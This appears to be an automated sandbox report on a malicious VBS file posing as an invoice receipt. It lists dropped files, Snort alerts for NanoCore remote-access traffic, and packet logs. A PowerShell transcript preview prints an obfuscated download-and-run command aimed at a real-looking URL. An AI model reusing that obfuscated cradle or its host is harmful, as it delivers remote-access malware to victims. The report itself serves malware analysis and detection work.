                          Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axtvtxvy.mrw.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvx5tmpj.e0j.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):216
                          Entropy (8bit):7.0915346664452
                          Encrypted:false
                          SSDEEP:3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKv2Fouo0/SZG0TtCBsm9VNoy:X4LDAnybgCFcps0OahouonZGffoboXUo
                          MD5:C8013C97F9E5AC8BC1A5C760C8E90286
                          SHA1:A635B2C83A4B1A0896FFA95CDF2C8F4A5FA8AD0D
                          SHA-256:ECC2D8FFD4183F94F2AC3CD082FFEFB0EACC07D266F9FEE9AB44E2DDE2A9839B
                          SHA-512:996F8CDA3E651D1E06AA4AF07FB552D9A9B466EBC694911E0C8C33333A11C80F43659F383B546DD049A30039A0B07EAABF50977FB53FD21C4A6C9F3B74A5679A
                          Malicious:false
                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....:}....?`.r.L..........2..eO.9..!.4....F8b.....Q|z.K2'd.F...lH.......O.;h...cV7..v..#*..O=..
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:International EBCDIC text, with no line terminators
                          Category:dropped
                          Size (bytes):8
                          Entropy (8bit):3.0
                          Encrypted:false
                          SSDEEP:3:Mstn:H
                          MD5:9694A30911D686B65D5945CB73621859
                          SHA1:8D910DDE2DE75E1AFECA2C739A57923B2778297E
                          SHA-256:FC067983418432829610764679C54ECD5053539CAC42EB61AAFEA092BCA9F3CF
                          SHA-512:905403BC4B89540777B79C48A979931324620B7BD173CBD12D40D4290B31088E4ADD555B5D9051F65AAF622F6AF97B613BCD724D01847BFDA59F4D3BACA77E5B
                          Malicious:true
                          Preview: .E....H
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):40
                          Entropy (8bit):5.153055907333276
                          Encrypted:false
                          SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                          MD5:4E5E92E2369688041CC82EF9650EDED2
                          SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                          SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                          SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                          Malicious:false
                          Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):315512
                          Entropy (8bit):7.999515228511566
                          Encrypted:true
                          SSDEEP:6144:1b3D1sqtOQWhesFBD2jk2jsbb3PqrhEYSp99iqJ120YES:1BZKe5jNjsX3PrYbqjFS
                          MD5:582B006BBF28E0A891A06EDA92B06C8F
                          SHA1:5121864FDE6CC7FC65408442E62B2B1BA7A678EA
                          SHA-256:7531A54E0B0E1090694E8CDECA5DE9B0088F45AF63BDFE83AE995D1B754B1B95
                          SHA-512:9D6EEE3F3221E2BB5967D6FA26310702EABF89EB366272EFFC9902232FA87CC648F40CB45C0A736F0ABFFA9C36D6E7F2C1E8E6DAF2C5676C775B95E58A24BB91
                          Malicious:false
                          Preview: .HP=... z.o.._..).;.........++.}...L.}x.._.t.}.:l...gP.;....Y./..-..K-*.$4.4..&...|...F1.+...}.1.w.0.....n..X....)..LKU.Rp{+....p~R.../.gF.q$...P..T...]PlGQ....h....K..k.n.d.t....WMH.E...%.z...8.=.V.NI.v.?.O.e..L`.v.[d.....w.wH..8....../%....In<.T..(h2...'......z..,...a!..RX...$.....v.|*.+.x...NQ .Ob.$.8I/d."2.........3..s.qs.{Et..*..6.|."..i..O.......G?c...#.....Z.l..v..p:3...Q.R@......d.....>..f>A..O.....T.........>...UR.Y{...O..;!,..d.!Zn.4..'.....{..1.xD..z...7..P.....`0..\.(.bQ......o{C^.d.....vS....;...q6+...a.{.........`}..j..q....Z...-../2.(...j..N.7n..9k.....M...M...3...!h...i..:Z=z....E]...9.pqN...x>......Ogr.cx_#....)...@.iF.OJ...1...~....r...;.vm.....U..;'X....J...@...i.`..,...7U......LZ....F.../.WO_..e.3..].....O=.w...Mk........i......%.......q...F.....'VH.Ce7..<..n.8..d.h..XY..tc....x./.8...|.=fX..T.0e.y.W.c`-r.3.<....j..(N.W.C.,....,...]..#..<u....|#....#M..M0's....9>..6.,.\B@.>....-@.uxq4..{.9..sH..<3>..........n..
                          C:\Users\user\Documents\20220114\PowerShell_transcript.210979.BVPagTEC.20220114133521.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):2529
                          Entropy (8bit):4.615766519367495
                          Encrypted:false
                          SSDEEP:48:BZPv/D0oOCXIh84TU4Bh2QjC4+3qDYB1ZsIh84TU4Bh2QjCoZZx:BZH/oN0fMU4n2QO73qDo1ZsfMU4n2QOq
                          MD5:665601201DF2CA8F9E745092B2660F3B
                          SHA1:FC48280CD19D80EE0F47F8CC11C9824B18F69661
                          SHA-256:75D121BBF2F25A1C03EFCE141DED1815A850E97877DF85416BF72853E6D69601
                          SHA-512:C54273F437923C72D00DF794CFF2656EA9409880D17CE4192D4C4919B36F844620F0F9B5018313003C31D92B19D319A5C6B6282EB5654574C0B0AD4CA38BD61E
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114133521..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 210979 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePl

                          Static File Info

                          General

                          File type:ASCII text, with very long lines, with CRLF line terminators
                          Entropy (8bit):4.72173429258582
                          TrID:
                            File name:G2M18C6INV0ICERECEIPT.vbs
                            File size:4866
                            MD5:e193dff484ce89bc7ba5ae2022ab7227
                            SHA1:49d652b6e0fe6071b99fa9a7e891cc5187ebc4db
                            SHA256:1b8775fa633e04edf24411129b02074e4a9b8a79c28896908ff57dafe7cde968
                            SHA512:a5796933a05066bb69a14b7c4bf0a77d3e5f58572390f9d342a39a95c14b43a2a6e67f7e9ecc163fd75552cd6226274f065f41be2888089901c19431b96878c5
                            SSDEEP:96:8ksgukFSHAaAkaJAzAQAczA2zhDzO4RO4aO4gzO48O4jO4UO4OO4cO4BRU17:88ukFOAaArJAzAQAczA2zhDC3A/CkZ2n
                            File Content Preview:H17437795812H13815631695 = replace("pow51`&^#%36&0`7!302<4^9~rsh51`&^#%36&0`7!302<4^9~ll ","51`&^#%36&0`7!302<4^9~","e")..H71315173172H22571292489 = "$!^^^#986^1^:&149:^^446x = '!^^^#986^1^:&149:^^446tt59613651831H21859773471://swmen644^^:941&:^1^689#^^^!

                            File Icon

                            Icon Hash:e8d69ece869a9ec4

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            01/14/22-13:35:48.969106UDP254DNS SPOOF query response with TTL of 1 min. and no authority53595968.8.8.8192.168.2.5
                            01/14/22-13:35:49.319718TCP2025019ET TROJAN Possible NanoCore C2 60B497649090192.168.2.5185.140.53.10
                            01/14/22-13:35:56.554811UDP254DNS SPOOF query response with TTL of 1 min. and no authority53652968.8.8.8192.168.2.5
                            01/14/22-13:35:56.825896TCP2025019ET TROJAN Possible NanoCore C2 60B497659090192.168.2.5185.140.53.10
                            01/14/22-13:36:01.522263UDP254DNS SPOOF query response with TTL of 1 min. and no authority53631838.8.8.8192.168.2.5
                            01/14/22-13:36:01.925765TCP2025019ET TROJAN Possible NanoCore C2 60B497669090192.168.2.5185.140.53.10
                            01/14/22-13:36:09.074173UDP254DNS SPOOF query response with TTL of 1 min. and no authority53551618.8.8.8192.168.2.5
                            01/14/22-13:36:09.394734TCP2025019ET TROJAN Possible NanoCore C2 60B497719090192.168.2.5185.140.53.10
                            01/14/22-13:36:16.719034UDP254DNS SPOOF query response with TTL of 1 min. and no authority53600758.8.8.8192.168.2.5
                            01/14/22-13:36:16.902888TCP2025019ET TROJAN Possible NanoCore C2 60B497759090192.168.2.5185.140.53.10
                            01/14/22-13:36:23.726896UDP254DNS SPOOF query response with TTL of 1 min. and no authority53643458.8.8.8192.168.2.5
                            01/14/22-13:36:23.929566TCP2025019ET TROJAN Possible NanoCore C2 60B497839090192.168.2.5185.140.53.10
                            01/14/22-13:36:31.021813TCP2025019ET TROJAN Possible NanoCore C2 60B497899090192.168.2.5185.140.53.10
                            01/14/22-13:36:37.680060TCP2025019ET TROJAN Possible NanoCore C2 60B497949090192.168.2.5185.140.53.10
                            01/14/22-13:36:44.881236TCP2025019ET TROJAN Possible NanoCore C2 60B498269090192.168.2.5185.140.53.10
                            01/14/22-13:36:51.852215TCP2025019ET TROJAN Possible NanoCore C2 60B498279090192.168.2.5185.140.53.10
                            01/14/22-13:36:58.986294TCP2025019ET TROJAN Possible NanoCore C2 60B498309090192.168.2.5185.140.53.10
                            01/14/22-13:37:05.991573TCP2025019ET TROJAN Possible NanoCore C2 60B498399090192.168.2.5185.140.53.10
                            01/14/22-13:37:13.112488UDP254DNS SPOOF query response with TTL of 1 min. and no authority53529298.8.8.8192.168.2.5
                            01/14/22-13:37:13.299326TCP2025019ET TROJAN Possible NanoCore C2 60B498549090192.168.2.5185.140.53.10
                            01/14/22-13:37:19.338992TCP2025019ET TROJAN Possible NanoCore C2 60B498569090192.168.2.5185.140.53.10
                            01/14/22-13:37:26.283379UDP254DNS SPOOF query response with TTL of 1 min. and no authority53568958.8.8.8192.168.2.5
                            01/14/22-13:37:26.476103TCP2025019ET TROJAN Possible NanoCore C2 60B498579090192.168.2.5185.140.53.10
                            01/14/22-13:37:33.347579UDP254DNS SPOOF query response with TTL of 1 min. and no authority53623728.8.8.8192.168.2.5
                            01/14/22-13:37:33.543905TCP2025019ET TROJAN Possible NanoCore C2 60B498589090192.168.2.5185.140.53.10
                            01/14/22-13:37:40.494740TCP2025019ET TROJAN Possible NanoCore C2 60B498599090192.168.2.5185.140.53.10
                            01/14/22-13:37:47.532016TCP2025019ET TROJAN Possible NanoCore C2 60B498619090192.168.2.5185.140.53.10
                            01/14/22-13:37:53.730244TCP2025019ET TROJAN Possible NanoCore C2 60B498629090192.168.2.5185.140.53.10
                            01/14/22-13:37:59.899209TCP2025019ET TROJAN Possible NanoCore C2 60B498639090192.168.2.5185.140.53.10
                            01/14/22-13:38:06.991189UDP254DNS SPOOF query response with TTL of 1 min. and no authority53643628.8.8.8192.168.2.5
                            01/14/22-13:38:07.174948TCP2025019ET TROJAN Possible NanoCore C2 60B498649090192.168.2.5185.140.53.10
                            01/14/22-13:38:14.127183TCP2025019ET TROJAN Possible NanoCore C2 60B498669090192.168.2.5185.140.53.10
                            01/14/22-13:38:20.973520UDP254DNS SPOOF query response with TTL of 1 min. and no authority53575158.8.8.8192.168.2.5
                            01/14/22-13:38:21.155957TCP2025019ET TROJAN Possible NanoCore C2 60B498679090192.168.2.5185.140.53.10
                            01/14/22-13:38:27.311861TCP2025019ET TROJAN Possible NanoCore C2 60B498689090192.168.2.5185.140.53.10
                            01/14/22-13:38:34.355886TCP2025019ET TROJAN Possible NanoCore C2 60B498699090192.168.2.5185.140.53.10
                            01/14/22-13:38:41.368139UDP254DNS SPOOF query response with TTL of 1 min. and no authority53615738.8.8.8192.168.2.5
                            01/14/22-13:38:41.548858TCP2025019ET TROJAN Possible NanoCore C2 60B498709090192.168.2.5185.140.53.10
                            01/14/22-13:38:46.547946TCP2025019ET TROJAN Possible NanoCore C2 60B498729090192.168.2.5185.140.53.10
                            01/14/22-13:38:53.429656UDP254DNS SPOOF query response with TTL of 1 min. and no authority53596888.8.8.8192.168.2.5
                            01/14/22-13:38:53.628808TCP2025019ET TROJAN Possible NanoCore C2 60B498739090192.168.2.5185.140.53.10
                            01/14/22-13:39:01.710029TCP2025019ET TROJAN Possible NanoCore C2 60B498749090192.168.2.5185.140.53.10
                            01/14/22-13:39:08.777931TCP2025019ET TROJAN Possible NanoCore C2 60B498759090192.168.2.5185.140.53.10
                            01/14/22-13:39:15.097236UDP254DNS SPOOF query response with TTL of 1 min. and no authority53504228.8.8.8192.168.2.5
                            01/14/22-13:39:15.283033TCP2025019ET TROJAN Possible NanoCore C2 60B498779090192.168.2.5185.140.53.10
                            01/14/22-13:39:22.058551UDP254DNS SPOOF query response with TTL of 1 min. and no authority53532478.8.8.8192.168.2.5
                            01/14/22-13:39:22.240653TCP2025019ET TROJAN Possible NanoCore C2 60B498789090192.168.2.5185.140.53.10

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 14, 2022 13:35:22.998898029 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:23.112740993 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:23.112899065 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:23.114211082 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:23.227852106 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:23.255115032 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:23.255188942 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:23.255242109 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:23.255258083 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:23.255295992 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:23.255342960 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:23.255358934 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:23.307183981 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:28.256263018 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:28.256441116 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.131200075 CET4975280192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.177587032 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.245121002 CET8049752107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.290981054 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.291134119 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.291266918 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.404390097 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426389933 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426433086 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426457882 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426481962 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426491022 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.426510096 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426534891 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426552057 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.426561117 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426589966 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426592112 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.426615953 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426641941 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.426649094 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.426688910 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.539695978 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.539784908 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.539855003 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.539915085 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.539958954 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.540031910 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.540052891 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540088892 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540113926 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540143967 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.540158033 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540183067 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540213108 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.540222883 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540246964 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540273905 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.540287971 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540313959 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540338993 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.540352106 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.540409088 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.653469086 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653529882 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653573990 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653613091 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653651953 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653682947 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653723955 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653757095 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.653764963 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653805017 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653847933 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.653868914 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653923988 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653964043 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.653974056 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.654005051 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654028893 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.654047012 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654087067 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654103994 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.654128075 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654169083 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654223919 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654230118 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.654264927 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654293060 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.654304981 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654344082 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654369116 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.654383898 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.654480934 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.767550945 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767623901 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767682076 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767731905 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.767743111 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767790079 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767827988 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767836094 CET4976180192.168.2.5107.180.25.2
                            Jan 14, 2022 13:35:35.767868042 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767906904 CET8049761107.180.25.2192.168.2.5
                            Jan 14, 2022 13:35:35.767915964 CET4976180192.168.2.5107.180.25.2

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 14, 2022 13:35:22.954824924 CET6173353192.168.2.58.8.8.8
                            Jan 14, 2022 13:35:22.984945059 CET53617338.8.8.8192.168.2.5
                            Jan 14, 2022 13:35:35.157130003 CET5244153192.168.2.58.8.8.8
                            Jan 14, 2022 13:35:35.176605940 CET53524418.8.8.8192.168.2.5
                            Jan 14, 2022 13:35:48.863003969 CET5959653192.168.2.58.8.8.8
                            Jan 14, 2022 13:35:48.969105959 CET53595968.8.8.8192.168.2.5
                            Jan 14, 2022 13:35:56.449099064 CET6529653192.168.2.58.8.8.8
                            Jan 14, 2022 13:35:56.554811001 CET53652968.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:01.414809942 CET6318353192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:01.522263050 CET53631838.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:08.967614889 CET5516153192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:09.074172974 CET53551618.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:16.610224009 CET6007553192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:16.719033957 CET53600758.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:23.620286942 CET6434553192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:23.726896048 CET53643458.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:30.824541092 CET5712853192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:30.842407942 CET53571288.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:37.462938070 CET5039453192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:37.482007980 CET53503948.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:44.660028934 CET5941353192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:44.679258108 CET53594138.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:51.641803980 CET6051653192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:51.661067963 CET53605168.8.8.8192.168.2.5
                            Jan 14, 2022 13:36:58.753150940 CET6508653192.168.2.58.8.8.8
                            Jan 14, 2022 13:36:58.772578955 CET53650868.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:05.769159079 CET5643253192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:05.786828995 CET53564328.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:13.006488085 CET5292953192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:13.112488031 CET53529298.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:19.104607105 CET6100453192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:19.126012087 CET53610048.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:26.175501108 CET5689553192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:26.283379078 CET53568958.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:33.239128113 CET6237253192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:33.347579002 CET53623728.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:40.263706923 CET6151553192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:40.283207893 CET53615158.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:47.328888893 CET5717253192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:47.346383095 CET53571728.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:53.511174917 CET5526753192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:53.528637886 CET53552678.8.8.8192.168.2.5
                            Jan 14, 2022 13:37:59.693948984 CET5096953192.168.2.58.8.8.8
                            Jan 14, 2022 13:37:59.713011980 CET53509698.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:06.885039091 CET6436253192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:06.991189003 CET53643628.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:13.906923056 CET6144653192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:13.926369905 CET53614468.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:20.863589048 CET5751553192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:20.973520041 CET53575158.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:27.066282034 CET5819953192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:27.085701942 CET53581998.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:34.126144886 CET6522153192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:34.145984888 CET53652218.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:41.258670092 CET6157353192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:41.368139029 CET53615738.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:46.333275080 CET5359153192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:46.352648973 CET53535918.8.8.8192.168.2.5
                            Jan 14, 2022 13:38:53.320635080 CET5968853192.168.2.58.8.8.8
                            Jan 14, 2022 13:38:53.429656029 CET53596888.8.8.8192.168.2.5
                            Jan 14, 2022 13:39:01.465456963 CET5603253192.168.2.58.8.8.8
                            Jan 14, 2022 13:39:01.484771013 CET53560328.8.8.8192.168.2.5
